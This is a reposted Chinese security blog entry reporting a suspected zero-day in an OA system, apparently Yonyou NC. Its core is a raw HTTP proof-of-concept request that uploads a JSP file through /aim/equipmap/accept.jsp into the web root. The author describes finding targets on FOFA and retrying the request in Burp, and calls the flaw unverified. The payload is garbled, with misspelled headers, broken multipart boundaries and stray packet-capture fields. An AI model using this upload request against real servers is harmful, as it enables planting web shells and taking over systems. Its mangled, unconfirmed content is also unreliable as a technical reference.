【护网情报】疑似某OA 0day曝光

admin 2022年7月27日08:41:35评论316 views字数 1097阅读3分39秒阅读模式



【护网情报】疑似某OA 0day曝光

声明


【护网情报】疑似某OA 0day曝光

以下内容并未证实,是否存在漏洞未可知。若漏洞真实存在,请遵守网络安全法,切勿用作违法用途,一切后果均与本人无关




【护网情报】疑似某OA 0day曝光

无意中看到一个POC




payload=POST/aim/equipmap/accept.jspHTTP/1.1User-Aaent:Mozilla/5.0 (Windows NT 10.0:Win64:x64) AppleWebKit/53736(KHTMLike Gecko)Chrome/890.4389.90 Safari/537.36Content-Length:436 Accept: text/html Connection: closeContent-Type:multipart/form-data;boundary=---------------------------16314487820932200903769468567 Accept-Encoding:gzip---------------16314487820932200903769468567Content-Disposition:form-data; name="upload;filename="222222.txt Content-Type:text/plain<% out.println("bea86d66a5278f9e6fa1112d2e2fcebf"); %>------------------16314487820932200903769468567Content-Disposition:form-data;name="fnameIwebappsnc web180900fd668c51631353aca37fc1f829.jsp------------16314487820932200903769468567--;tcp.flags=24;tcp.flags.syn=0;tcp.flags.ack=1;tcp.flags.reset=0;tcp.flags.fin=0;tcp.flags.push=1tcp.flags.urg=0;tcp.seq=2292457002;tcp.nxtseq=956110407;tcp.window size=229





看这个请求链接查了一下,应该是 用有NC的,然后就在fofa上搜了一下。该OA系统确实存在accept.jsp文件,但是访问报错。

【护网情报】疑似某OA 0day曝光



【护网情报】疑似某OA 0day曝光




于是就用burp构造了一个请求包,但还是报错,不过这次报错的内容不太一样。或许POC有问题,也有可能没有这个漏洞。没有源码,也懒得去验证,睡觉保命要紧。

【护网情报】疑似某OA 0day曝光




【护网情报】疑似某OA 0day曝光




【护网情报】疑似某OA 0day曝光


原文始发于微信公众号(安全透视镜):【护网情报】疑似某OA 0day曝光

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年7月27日08:41:35
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【护网情报】疑似某OA 0day曝光http://cn-sec.com/archives/1203017.html

发表评论

匿名网友 填写信息